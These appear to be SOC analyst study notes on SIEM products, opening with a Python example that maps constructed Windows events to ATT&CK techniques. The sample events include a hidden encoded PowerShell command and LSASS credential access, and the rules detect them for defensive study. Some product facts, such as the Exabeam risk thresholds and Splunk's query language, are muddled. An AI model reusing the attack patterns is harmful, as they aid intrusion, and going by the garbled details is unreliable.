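In a SIEM the "what can a SOC analyst do" items above become correlation rules that tag raw events with the ATT&CK technique they indicate. The following is an added example, not from the original notes: a handful of constructed, simplified Windows Security, System and Sysmon event records are matched against small rules that attach the technique IDs listed in this section (T1059.001 and T1027, T1053, T1021.001, T1562, T1003) together with the analyst action the notes recommend, and the results are grouped per host so the analyst can see how far the chain progressed. The event IDs are the standard Windows ones (4688 process creation, 4698 scheduled task created, 4624 logon with type 10 for RDP, 7036 service state change, Sysmon 10 process access); the field names, hosts, user and paths are constructed for the demo.

```python
"""Mapping SIEM events to MITRE ATT&CK techniques.

Added example, not from the original notes. Constructed, simplified Windows
event records are matched by small rules that tag them with the technique
IDs listed in the section above and the SOC action the notes recommend.
Event IDs are the standard Windows Security/System and Sysmon IDs; field
names, hosts, user and paths are constructed.
"""

# Constructed events: each dict holds the fields a SIEM parser would extract.
SAMPLE_EVENTS = [
    {"source": "Security", "event_id": 4688, "host": "WS01", "user": "chanti",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand <base64 placeholder>"},
    {"source": "Security", "event_id": 4698, "host": "WS01", "user": "chanti",
     "task_name": r"\Microsoft\Windows\Updater", "task_command": r"C:\Users\Public\u.exe"},
    {"source": "Security", "event_id": 4624, "host": "SRV02", "user": "chanti",
     "logon_type": 10, "src_ip": "10.10.10.1"},
    {"source": "System", "event_id": 7036, "host": "WS01",
     "service": "Windows Defender Antivirus Service", "state": "stopped"},
    {"source": "Sysmon", "event_id": 10, "host": "WS01", "user": "chanti",
     "image": r"C:\Users\Public\u.exe", "target_image": r"C:\Windows\System32\lsass.exe"},
    {"source": "Security", "event_id": 4624, "host": "WS01", "user": "chanti",
     "logon_type": 2, "src_ip": "-"},  # interactive console logon: benign, matches no rule
]

# (predicate, technique IDs, tactic, analyst action) - technique IDs as in the notes.
RULES = [
    (lambda e: e["event_id"] == 4688
               and "powershell" in e.get("image", "").lower()
               and "-encodedcommand" in e.get("cmdline", "").lower(),
     ["T1059.001", "T1027"], "Execution / Defense Evasion",
     "decode and review the command; restrict PowerShell use and log all activity"),
    (lambda e: e["event_id"] == 4698,
     ["T1053"], "Persistence",
     "review the new scheduled task and the binary it runs"),
    (lambda e: e["event_id"] == 4624 and e.get("logon_type") == 10,
     ["T1021.001"], "Lateral Movement",
     "confirm the RDP source is an authorised admin host"),
    (lambda e: e["event_id"] == 7036 and e.get("state") == "stopped"
               and any(k in e.get("service", "").lower() for k in ("defender", "antivirus", "edr")),
     ["T1562"], "Defense Evasion",
     "alert on AV/EDR service termination; verify who stopped it"),
    (lambda e: e["source"] == "Sysmon" and e["event_id"] == 10
               and e.get("target_image", "").lower().endswith("lsass.exe"),
     ["T1003"], "Credential Access",
     "LSASS accessed by a non-system process; isolate the host and reset exposed credentials"),
]


def map_events(events, rules=RULES):
    """Return one finding per (event, matching rule)."""
    findings = []
    for ev in events:
        for predicate, techniques, tactic, action in rules:
            if predicate(ev):
                findings.append({"host": ev["host"], "event_id": ev["event_id"],
                                 "techniques": techniques, "tactic": tactic, "action": action})
    return findings


def kill_chain_by_host(findings):
    """Group technique IDs per host so the analyst sees how far the chain progressed."""
    chain = {}
    for f in findings:
        chain.setdefault(f["host"], set()).update(f["techniques"])
    return {host: sorted(techs) for host, techs in chain.items()}


if __name__ == "__main__":
    found = map_events(SAMPLE_EVENTS)
    for f in found:
        print(f["host"], f["event_id"], f["tactic"], f["techniques"], "->", f["action"])
    print(kill_chain_by_host(found))
```

On the sample, WS01 shows execution, persistence, defense evasion and credential access in sequence, which is the pattern that should raise the incident's priority, while SRV02 only shows an RDP logon that needs confirming against the list of authorised admin hosts.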

Other log sources: CrowdStrike, Forcepoint DLP, O365 etc.

IBM QRadar will provide out-of-the-box test cases or use cases for testing of the correlation rule or condition or building blocks (BB) algorithm.
Examples
1) From a disabled account login failures are occurring
2) From a terminated account login failures are coming
3) Impossible traversal attacks for VPN
4) Multiple authentication login failures from the same source IP
5) Multiple authentication login failures from the same source user
6) Virus detected
7) Malware detected

Note: BB or building blocks are a subset of CRE rule creation. A BB will not provide any alert or offense notification.

What is the difference between building blocks and correlation rules? A BB will not provide any security notification as an incident, but it can be used for testing of the use case or correlation rule. On the other hand, a correlation rule will provide a security incident notification as an offense.

IBM App Host: it is a centralised management app where we can see CPU utilization, RAM utilization, memory utilization, UEBA, threat hunting, node and threat intelligence feeds information etc.

IBM X-Force: it will provide regular threat intelligence news information, attack information and vulnerability information about what the adversaries are doing.
There are two different types of TFI (threat feed intelligence) of IBM X-Force:
1) Open source: mainly for reputation checks of IP addresses, domain validation and also URL validation
2) Commercial feed: customers will get regular threat intelligence or feeds

Dashboards: there are two different types of dashboards that can be created under IBM QRadar: 1) default, 2) customized.
Default dashboards: security posture of the organization, threat summary, application summary, network summary, asset summary, risk information, asset identification, offenses summary
Customized dashboards: health check status, firewall denied activity, firewall allowed activity, IDS/IPS allowed activity, EDR/XDR quarantine activity, application outbound information
How to create customised dashboards
1) Go to Log Activity; write or filter based on a basic or advanced search using AQL or PGSQL (everything is in the drop-down list), e.g. data source WAF, QID (QRadar ID), OWASP Top 10
2) Save
3) Go back to Dashboard and create a new dashboard based on the query created

Reports: default, customized
Customized reports: 1) technical reports, 2) process-oriented reports
Technical reports: health check-up status, firewall denied activity, WAF firewall OWASP Top 10 category of the attacks, EDR related reports, DLP related reports
Process-oriented reports
1) 1 day: how many offences are closed, WIP, on hold/pending, cancelled, new
2) Weekly: total number of offences, closure of the offenses, on hold/pending, cancelled, new
3) Monthly
4) Quarterly
5) Annual
Comparison reports (week on week or month on month): bar chart, pie chart

QRadar reference set: a list of unique values that can be used for various purposes
1) Comparing property values
2) Storing the business data
3) Storing the external data
4) Keeping watch lists
5) Under the correlation rules
6) Defining the rules under rule response
7) Searches
A couple of examples of reference sets are: source IP, destination IP, source MAC, destination MAC, event ID, source port, destination port, event time stamp, domain name or host name or computer name or FQDN.
By default QRadar suggests, based on best practices, that it is better to use the reference set as IP address.
QDI (QRadar Deployment Intelligence): this app will monitor QRadar deployment intelligence historical data on a per-host basis and also QRadar metrics like performance issues, health issues (BW utilization, CPU utilization, RAM utilization etc.), event rates information, flow rates information etc.

QID (QRadar ID): this ID is the equivalent of the Windows event ID in the Windows OS. In the same way QRadar maintains a QRadar ID for different types of actions. Those actions or activities are:
1) Different types or categories of attacks (based on the signature)
2) Based on application
3) Based on the performance
4) Based on configuration or setup or implementation or administration

QNI (QRadar Network Insights): this app will provide information about QRadar network traffic analysis and also network attack information like the spoofing and flooding categories of attacks.

Correlation rule creation: under the Offences tab we can create a correlation rule based on
1) Events
2) Flows
3) Events and flows
4) Offences (existing correlation rule)
Example: DoS attack / throttling on the DB server - QRadar CRE rule with a 10000/sec rate limit; my business requirement for PGSQL is 20000/sec.

Case management
1) Third party case management: SNOW, Jira, Sharewell, HP, ITSM, ManageEngine, Remedy, BSD etc.
2) Inbuilt case management: within the tool itself we can handle the whole lifecycle from new to closure of the incident.

2) Exabeam (query based)

Exabeam architecture diagram or components
1) Data lake (pool of the logs): deeper investigation, correlation rule creation, fetching or querying the data using SQL queries, reducing the false positives, administration, context table creation, implementation
2) Node (log processor): the node will do processing of the logs - storing of the logs, filtering, querying, indexing, CRE
3) Exabeam log collector: collection of the logs, aggregation, parsing, normalization
4) AA (Advanced Analytics engine): threat hunting, SOAR, UEBA, administration, correlation rule creation

Backend process (how the alert will be triggered)

Licensing: GB/day (total EPS count), total number of end users

Firm versions or OS / deployment versions
1) Hardware based (2000, 3000, 4000, 5000 etc.): Data lake i47, i59; Node 1000, 2000 and 3000; AA (Advanced Analytics engine) 4000, 5000 and 6000
2) Software

Implementation: 1) stand alone, 2) distributed

Features or licensing
1) Node
2) UEBA
3) Threat hunting
4) SOAR - Incident Responder
5) Cloud connector (third party - Skyformation, IBM, Oracle, Citrix, Fortigate etc.)
6) Premium support
7) Advanced analytics engine
8) Threat intelligence (GTI - Global Threat Intelligence)

Note: from the Exabeam data lake we can integrate the pool of the logs with other SIEM tool vendors as well.

Backend query language or database: 1) SQL
Common event format: CEF
Incident score or risk score or alert score: low, medium, high and critical; incidents scoring >90 are considered critical
Visualizations: based on our business requirement, under the data lake we give a query, save it under the visualizations and fetch the data from the dashboard
Context tables: integrate AD (LDAP) so that, whenever a security incident is triggered, we know who has done what; it also gives the team hierarchy details
Risk score under Exabeam: based on the correlation rule or policy or condition algorithm or risk score, >90 is medium, high and critical; <90 we consider low and info and we can ignore these incidents
Threat hunting: go to the search field under Advanced Analytics and do threat hunting the manual way using event ID, segmentation, log source or data source, source IP, destination IP, action of the data source and so on
Incident name under Exabeam: incident only
* (Exabeam, Sentinel, ELK, Securonix and Splunk): the data lake or search heads hold the pool of the logs; a search for * returns all logs

3) LogRhythm (not query based)

LR (LogRhythm) components
1) LC (Log collector): it will collect logs from different types of log sources and it will complete aggregation, parsing and normalization
2) LM (Log manager) (DP & DI): it will complete processing of the logs and also indexing, querying and filtering; additionally it has the AIE (Advanced analytics engine)
3) EM & PM (Event manager and platform manager): SOC team operations (L1, L2 and L3 investigations), UEBA, threat hunting, Cloud AI, alarms (0-100), reports and admin
LogRhythm backend process

LR integration methods or LR onboarding methods: 1) Syslog, 2) collector agent, 3) WMI, 4) API, 5) cloud connector method

Deployment: stand alone, distributed, cloud
Implementations: 1) hardware, 2) software, 3) all in one box, 4) cloud
Alerts or incidents: alarms (01-100 scale range)

Alarm is triggered on a 0-100 scale
80-100   Critical       P1
60-80    High           P2
40-60    Medium         P3
<40      Low and Info   P4 and P5

AIE (Advanced analytics engine): 1) default correlation rules, 2) customized correlation rules

Features and licensing of LogRhythm: 1) UEBA, 2) threat hunting, 3) SOAR - LogRhythm SOAR, 4) premium support, 5) GTI - Global Threat Intelligence

Backend query language used by LR: SQL
Common event format name: CEF
Log integration methods: Syslog, collector agent, cloud connector, WMI, API token method

4) McAfee (not query based tool)

McAfee SIEM tool components or architecture diagram
1) ESM - Enterprise Security Manager
2) ELM - Event Log Manager
3) ERC - Event Receiver

Backend process

Additional licenses or features or modules: 1) storage, 2) DAM, 3) APM, 4) GTI, 5) UBA, 6) threat hunting, 7) SOAR, 8) premium support
Deployment: 1) standalone, 2) distributed, 3) all in one box
Implementation: hardware based, software, cloud
Log integration methods: 1) Syslog, 2) collector agent (ERC), 3) cloud connector, 4) API token method, 5) WMI

Risk score / incident score / alert score: 0-100
Critical   80-100
High       60-80
Medium     40-60
Low        20-40
Info       0-20

Backend database: SQL
Common event format name: CEF
Correlation rule engine: CRE engine

HP ArcSight (Micro Focus)
HP hardware: CSC / DXC or HP Enterprise; HP software: Micro Focus

Two different types of SIEM tools in HP ArcSight
1) HP ArcSight Express: small and medium scale industries
2) HP ArcSight ESM: enterprise level

HP ArcSight components: 1) ESM or SIEM console GUI, 2) LM, 3) LC (Smart connectors and Flex connectors)

Backend process

Log integration methods: 1) Syslog, 2) collector agent, 3) WMI, 4) MSRPC, 5) cloud connector, 6) API token methods

Log collectors: there are two types of log collectors
1) Smart connector: supports aggregation, normalization and parsing of known log formats
2) Flex connector: supports aggregation, normalization and parsing of unknown log formats

Additional licensing: 1) flow collector, 2) Risk Manager, 3) UEBA, 4) threat hunting, 5) SOAR, 6) premium support, 7) GTI - Global Threat Intelligence

Incident score / alert score
Critical   80-100
High       60-80
Medium     40-60
Low        20-40
Info       0-20

Event format: CEF (Common Event Format)
Backend database: SQL
Deployment: 1) standalone, 2) distributed
Implementation: 1) software

There are two consoles
1) Investigation console: threat hunting / SOAR / UEBA / reports / case management / Risk Manager
2) ACC - ArcSight Command Center: dashboard / reports / CRE / admin

Splunk
Splunk is merged with Cisco or acquired by Cisco

Splunk components or architecture diagram
1) Splunk forwarders (search forwarders): 1) universal, 2) light weight, 3) heavy weight forwarder
2) Search indexers
3) Search heads (SIEM console, GUI, user console)

Backend process of Splunk

Log integration methods
1) Syslog: 514
2) Collector agent (Splunk forwarders): Windows collector agent or Unix collector agent method; ports 443, 8443, 9093
3) Cloud connector: cloud service provider logs to the SIEM tool
4) Apps method (customized apps for each and every vendor)
5) API token method: SaaS based applications

Splunk backend programming language: SPL - Splunk programming language
* = all logs
Boolean algebra functions = AND or OR or NOT

Additional licensing or components or features
1) Splunk cluster: high availability
2) Deployment server: it can be used to decide how many forwarders, indexers and processors are required in each and every location
3) License manager: it is a centralised license manager and it can be used to manage the licenses either for a standalone deployment or a distributed deployment
4) UEBA
5) Threat hunting
6) GTI - Global threat intelligence
7) Apps method
8) Premium support
9) SOAR - Phantom

Splunk deployment: standalone, distributed deployment
Implementation: hardware, software, cloud
Log format: CEF - Common event format
Correlation rule engine: CRE
Backend query language: SPL - Splunk programming language
Incident name: alert or incident
Splunk supports inbuilt case management and third party case management as well
Splunk forwarders or search forwarders are mainly used for: 1) aggregation, 2) normalization, 3) parsing
Splunk forwarder types: 1) universal, 2) light weight, 3) heavy weight

Feature          Universal forwarder                                Lightweight forwarder                              Heavy weight forwarder
Functionality    Only collection of the logs, aggregation and       Light data parsing, aggregation and normalization  Data parsing, indexing, collection, aggregation
                 normalization; it will not do parsing                                                                 and normalization
